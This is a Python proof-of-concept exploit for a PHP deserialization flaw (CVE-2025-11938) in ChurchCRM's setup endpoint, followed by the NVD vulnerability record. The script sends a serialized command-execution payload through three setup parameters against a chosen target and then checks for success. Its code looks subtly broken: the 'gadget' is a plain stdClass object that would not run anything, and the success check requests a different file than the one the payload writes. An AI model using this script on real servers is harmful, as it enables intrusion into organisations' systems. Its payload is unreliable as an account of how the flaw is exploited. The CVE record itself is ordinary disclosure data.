CVE-2025-11938

# CVE-2025-11938 - ChurchCRM PHP Deserialization PoC # Vulnerability: Unserialize of user-controlled parameters in setup/routes/setup.php # Affected parameters: DB_PASSWORD, ROOT_PATH, URL import requests import sys TARGET_URL = sys.argv[1] if len(sys.argv) > 1 else "http://target-churchcrm.example.com" # PHP serialized gadget chain payload (example using a common PHP gadget) # This payload triggers __destruct() magic method to execute system command MALICIOUS_PAYLOAD = 'O:8:"stdClass":1:{s:7:"command";s:27:"system(\'id > /tmp/pwned\')";}' def exploit(): """ Exploit CVE-2025-11938 by sending malicious serialized data through the vulnerable setup.php parameters. """ endpoint = f"{TARGET_URL}/setup/routes/setup.php" # Method 1: Inject via DB_PASSWORD parameter params_db = { "DB_PASSWORD": MALICIOUS_PAYLOAD, "ROOT_PATH": "/var/www/html/churchcrm", "URL": TARGET_URL, "action": "test" } print(f"[*] Targeting: {endpoint}") print(f"[*] Sending malicious payload via DB_PASSWORD parameter...") try: response = requests.post(endpoint, data=params_db, timeout=10) print(f"[+] Response status: {response.status_code}") print(f"[+] Response body: {response.text[:500]}") # Verify exploitation verify = requests.get(f"{TARGET_URL}/tmp/pwned.txt", timeout=5) if verify.status_code == 200: print(f"[+] Exploitation successful! Output: {verify.text}") else: print("[-] Could not verify exploitation via /tmp/pwned") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") # Method 2: Inject via ROOT_PATH parameter params_root = { "DB_PASSWORD": "password123", "ROOT_PATH": MALICIOUS_PAYLOAD, "URL": TARGET_URL, "action": "test" } print(f"\n[*] Sending malicious payload via ROOT_PATH parameter...") try: response = requests.post(endpoint, data=params_root, timeout=10) print(f"[+] Response status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") # Method 3: Inject via URL parameter params_url = { "DB_PASSWORD": "password123", "ROOT_PATH": "/var/www/html/churchcrm", "URL": MALICIOUS_PAYLOAD, "action": "test" } print(f"\n[*] Sending malicious payload via URL parameter...") try: response = requests.post(endpoint, data=params_url, timeout=10) print(f"[+] Response status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") if __name__ == "__main__": exploit()

{"cve": {"id": "CVE-2025-11938", "sourceIdentifier": "[email protected]", "published": "2025-10-19T08:15:32.760", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in ChurchCRM up to 5.18.0. This vulnerability affects unknown code of the file setup/routes/setup.php. Performing a manipulation of the argument DB_PASSWORD/ROOT_PATH/URL results in deserialization. The attack may be initiated remotely. The attack's complexity is rated as high. It is stated that the exploitability is difficult. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.9, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 5.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.2, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "baseScore": 5.1, "accessVector": "NETWORK", "accessComplexity": "HIGH", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 4.9, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-502"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:*", "versionEndIncluding": "5.18.0", "matchCriteriaId": "058A38FC-F02C-46DD-998C-B74587FCFC28"}]}]}], "references": [{"url": "https://github.com/uartu0/advisories/blob/main/churchcrm-setup-rce-2025.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.329014", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.329014", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.671083", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}